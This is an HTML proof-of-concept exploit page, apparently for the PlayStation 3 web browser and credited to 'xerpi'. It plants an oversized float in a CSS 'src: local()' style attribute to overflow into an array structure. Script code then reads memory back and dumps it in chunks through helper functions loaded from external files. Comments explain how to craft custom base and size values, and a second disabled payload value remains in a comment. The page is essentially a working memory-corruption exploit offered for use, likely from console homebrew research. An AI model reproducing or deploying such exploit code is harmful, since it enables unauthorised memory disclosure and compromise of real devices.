<html>
<h1 id=1 style="src: local(
-0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000086916948407409767516802141034245578305928338506000167136272903009391749587200424
);" />
<body>
<h2>PS3 PoC</h2><h3>by xerpi</h3></br>
<script src="include/jquery.js"></script>
<script src="include/utils.js"></script>
<script type="text/javascript">
/* The large float number in the <h1> style attribute above overflows into
an array that is laid out like:
struct array {
void *base;
int size;
};
To set a custom base and size, use the h2f tool.
It "converts" the base and size and gives you the corresponding float number.
*/
// Global state shared by main() and by the summary lines written at the end of this script.
// Base address; in this script block it is only printed in the "BASEADDR" summary line.
var BASE_ADDR = 0x8000000;
// The <h1 id=1> element whose inline style carries the oversized src: local(...) value.
var ele = document.getElementById('1');
// Read that style's src value back as a string.
var mem = ele.style.src;
mem = mem.substr(6); // drop the first 6 characters, i.e. the leading "local(" prefix
// Size reported as bytes: two per string character (presumably one 16-bit code unit each; confirm).
var memsize = mem.length*2;
// Chunk length passed to send_dump_real_addr() on each call.
// NOTE(review): 0x00050000 is 327,680 bytes (320 KiB); the original comment said "0.5MB", which would be 0x80000.
var STEP = 0x00050000;
// Offset of the next chunk to dump; main() advances it by STEP.
var i = 0;
/**
 * Dump one STEP-sized chunk per call, starting at the global offset `i`.
 *
 * While `i` is below 0x00050000, the chunk at `i` is handed to
 * send_dump_real_addr() and `i` is advanced by STEP. That bound equals the
 * current STEP value, so with the globals as declared only the first call
 * requests a dump; every later call just logs the end-of-dump banner.
 *
 * Reads and writes the globals `i` and `STEP`; returns nothing.
 */
function main()
{
    var DUMP_LIMIT = 0x00050000;
    var BANNER_REPEATS = 8;

    //find_str_step("ELF");
    if (!(i < DUMP_LIMIT)) {
        // Past the limit: repeat the banner so it stands out in the log.
        for (var n = 0; n < BANNER_REPEATS; n++) {
            logAdd("======== END OF DUMP ========");
        }
        return;
    }

    send_dump_real_addr(i, STEP);
    i += STEP;

    // Earlier experiments, left disabled by the author:
    /*var msg = "";
    var start = "";
    var end = "";
    for (j = 0; j < 0x04000000; j+= 0x80000) {
    start = j.toString(16).toUpperCase();
    end = (j+0x80000).toString(16).toUpperCase();
    msg = msg + " 0x" + start + "-0x" + end + ".bin";
    }
    dbg(msg);*/
    //send_read(0x1985e4, 0x100);
    /*var block = 0x3500;
    for (var i = 0; i < len; i+= block) {
    dump_bytes(i, block)
    }*/
    //send_dump(10, 0x100);
    //send_dump(0, 0x100);
    //send_read(0x6ab180, 0x1000);
    //send_dump(0x50b78c, 0xA0000);
    //send_disasm(0x50b78d+0x120, 500);
    //logAdd(s.charCodeAt(n));
}
/**
 * Click handler for the "Start" button.
 *
 * Runs main() between a start and an end log marker. Anything thrown along
 * the way is passed to dbg() rather than propagating out of the handler, so
 * the end marker is skipped when main() fails.
 */
function btnClick()
{
    try {
        logAdd("======== Start ========");
        main();
        logAdd("======== End ========");
    } catch (err) {
        dbg(err);
    }
}
// Print environment info. writeEnvInfo() is not defined in this script block
// (presumably it comes from include/utils.js; confirm).
writeEnvInfo();
// Disabled by the author: would have written a second element (id=2) whose
// style carries a different src: local(...) float value.
/*
document.write(
"<h1 id=2 style=\"src: local(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000149166814797656930317536036916555936412317292798868691882309311268890342299594479676190658843261809903653034673295432095120696840889311854451790224796789957659858969637731992149641303614889028974326961354630);\" />"
);*/
// Summary line 1: the configured base address in upper-case hex.
document.write("BASEADDR: 0x" + BASE_ADDR.toString(16).toUpperCase() + "<br/>");
// Summary line 2: the computed size in upper-case hex bytes and in MB (bytes / 1024 / 1024).
document.write("MEM SIZE: 0x" + memsize.toString(16).toUpperCase() +
" bytes (" + (memsize/1024)/1024 + " MB)<br/><br/>");
</script>
<button style="width:100px;" onclick="btnClick();">Start</button>
<br/><br/>
<div id="log"></div><br>
</body>
</html>